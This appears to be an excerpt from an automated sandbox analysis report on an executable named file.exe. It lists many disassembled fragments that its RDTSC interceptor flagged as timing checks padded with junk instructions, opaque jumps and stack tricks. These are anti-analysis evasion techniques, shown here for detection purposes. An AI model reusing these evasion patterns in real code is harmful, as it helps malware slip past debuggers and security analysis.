Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A1C1C second address: 12A1CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edi 0x00000008 push ebx 0x00000009 jnl 00007F849CD73E56h 0x0000000f pop ebx 0x00000010 pop edi 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F849CD73E58h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c jnp 00007F849CD73E60h 0x00000032 call 00007F849CD73E68h 0x00000037 pop esi 0x00000038 mov edi, dword ptr [ebp+122D2E10h] 0x0000003e push 00000000h 0x00000040 js 00007F849CD73E5Eh 0x00000046 jnc 00007F849CD73E58h 0x0000004c push 00000000h 0x0000004e and edi, dword ptr [ebp+122D2C9Ch] 0x00000054 mov si, 4C45h 0x00000058 xchg eax, ebx 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d jnl 00007F849CD73E56h 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A1CA1 second address: 12A1CB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CD2597Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A1CB3 second address: 12A1CBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F849CD73E56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A2804 second address: 12A2818 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F849C77677Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A28BA second address: 12A28BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A5275 second address: 12A527B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A57B4 second address: 12A57B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A678E second address: 12A6792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A6792 second address: 12A6830 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F849D367C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F849D367C78h 0x00000010 popad 0x00000011 push eax 0x00000012 jl 00007F849D367C8Bh 0x00000018 jmp 00007F849D367C85h 0x0000001d nop 0x0000001e jmp 00007F849D367C89h 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007F849D367C78h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 00000017h 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 jmp 00007F849D367C86h 0x00000046 sbb ebx, 49E60B9Dh 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F849D367C83h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A6830 second address: 12A6836 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A6836 second address: 12A683A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A78AA second address: 12A78B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A88A6 second address: 12A88AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A88AC second address: 12A88B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A7B03 second address: 12A7B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A895A second address: 12A895E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A7B07 second address: 12A7B0D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A7B0D second address: 12A7B7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C776785h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov ebx, dword ptr [ebp+1244C7C7h] 0x00000012 add dword ptr [ebp+122D1C6Eh], esi 0x00000018 push dword ptr fs:[00000000h] 0x0000001f stc 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 clc 0x00000028 mov eax, dword ptr [ebp+122D1051h] 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007F849C776778h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 00000015h 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 mov dword ptr [ebp+122D36D1h], ebx 0x0000004e push FFFFFFFFh 0x00000050 sub dword ptr [ebp+122D32B4h], ecx 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A7B7D second address: 12A7B8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849D367C7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A8AB7 second address: 12A8ACA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F849C776778h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A8ACA second address: 12A8ACF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AB8D2 second address: 12AB8D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125AEBC second address: 125AEDB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F849D367C78h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F849D367C81h 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125AEDB second address: 125AF06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F849C776776h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 je 00007F849C776776h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push edi 0x00000019 pop edi 0x0000001a popad 0x0000001b jmp 00007F849C77677Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125AF06 second address: 125AF0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125AF0A second address: 125AF0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12ABE72 second address: 12ABEEC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnp 00007F849D367C76h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d sub ebx, dword ptr [ebp+122D2DECh] 0x00000013 push 00000000h 0x00000015 mov dword ptr [ebp+12457582h], esi 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007F849D367C78h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 0000001Dh 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 mov bx, C602h 0x0000003b movzx edi, bx 0x0000003e xchg eax, esi 0x0000003f jp 00007F849D367C84h 0x00000045 jmp 00007F849D367C7Eh 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jns 00007F849D367C89h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12ABEEC second address: 12ABEF1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AD082 second address: 12AD087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AD087 second address: 12AD0A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C776780h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AD1FF second address: 12AD205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AD205 second address: 12AD210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B2F0F second address: 12B2F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F849D367C78h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 xor edi, dword ptr [ebp+122D2DECh] 0x0000002b sub dword ptr [ebp+1244C813h], ecx 0x00000031 push 00000000h 0x00000033 mov ebx, 643811B7h 0x00000038 add dword ptr [ebp+122D1C49h], ecx 0x0000003e push 00000000h 0x00000040 clc 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 pop eax 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B40C0 second address: 12B40C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B40C5 second address: 12B40D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F849D367C7Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B01BB second address: 12B01C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B11A3 second address: 12B1206 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849D367C81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F849D367C78h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 push dword ptr fs:[00000000h] 0x0000002b stc 0x0000002c mov dword ptr fs:[00000000h], esp 0x00000033 sub bx, 22A1h 0x00000038 mov eax, dword ptr [ebp+122D122Dh] 0x0000003e xor di, 5059h 0x00000043 push FFFFFFFFh 0x00000045 mov dword ptr [ebp+122D32D7h], edx 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 push edi 0x00000051 pop edi 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B1206 second address: 12B120C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B01C1 second address: 12B0270 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F849D367C78h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 xor dword ptr [ebp+122D2817h], esi 0x0000002b mov edi, dword ptr [ebp+122D3902h] 0x00000031 push dword ptr fs:[00000000h] 0x00000038 cmc 0x00000039 jmp 00007F849D367C83h 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 sub dword ptr [ebp+122DB9B2h], esi 0x0000004b mov dword ptr [ebp+122D2F53h], ebx 0x00000051 mov eax, dword ptr [ebp+122D123Dh] 0x00000057 mov di, ax 0x0000005a push FFFFFFFFh 0x0000005c push 00000000h 0x0000005e push ebx 0x0000005f call 00007F849D367C78h 0x00000064 pop ebx 0x00000065 mov dword ptr [esp+04h], ebx 0x00000069 add dword ptr [esp+04h], 00000015h 0x00000071 inc ebx 0x00000072 push ebx 0x00000073 ret 0x00000074 pop ebx 0x00000075 ret 0x00000076 mov edi, dword ptr [ebp+122D19ACh] 0x0000007c jmp 00007F849D367C89h 0x00000081 push eax 0x00000082 push esi 0x00000083 pushad 0x00000084 push eax 0x00000085 push edx 0x00000086 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B30E0 second address: 12B30E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B30E5 second address: 12B30EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B4F56 second address: 12B4F60 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F849C776776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B30EB second address: 12B30EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B30EF second address: 12B30FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B30FE second address: 12B3102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B3102 second address: 12B3115 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C77677Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B600A second address: 12B600E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B600E second address: 12B6018 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F849C776776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B6205 second address: 12B6209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B6209 second address: 12B620D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B62B9 second address: 12B62BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BEC29 second address: 12BEC2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BEC2F second address: 12BEC3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F849D367C76h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BEC3A second address: 12BEC67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C776786h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F849C776781h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BEC67 second address: 12BEC6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BEEB5 second address: 12BEED1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F849C776776h 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F849C77677Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BEED1 second address: 12BEEDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C3374 second address: 12C3378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C3378 second address: 12C337E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C337E second address: 12C3384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C3451 second address: 12C345F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849D367C7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C353F second address: 12C354F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C354F second address: 12C355E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C355E second address: 12C3565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C3565 second address: 12C356F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F849D367C76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C356F second address: 12C358E instructions: 0x00000000 rdtsc 0x00000002 je 00007F849C776776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F849C77677Fh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C358E second address: 12C3594 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C36CF second address: 12C36D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C36D3 second address: 12C36E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C36E1 second address: 12C36E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C36E5 second address: 12C36EF instructions: 0x00000000 rdtsc 0x00000002 js 00007F849D367C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C36EF second address: 12C36F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C86B5 second address: 12C86D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849D367C89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C9070 second address: 12C907C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C95F9 second address: 12C9609 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F849D367C7Ah 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C9609 second address: 12C9631 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C776784h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F849C77677Bh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C9631 second address: 12C963A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12CDF7C second address: 12CDFCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C776782h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F849C776787h 0x0000000e popad 0x0000000f jp 00007F849C776799h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F849C776789h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1299233 second address: 129923E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F849D367C76h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129923E second address: 1299244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1299244 second address: 1299248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1299248 second address: 1299271 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA4207h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1299271 second address: 1299275 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1299275 second address: 127F099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F849CDA41F8h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 mov ecx, edx 0x00000024 call dword ptr [ebp+122D38C4h] 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
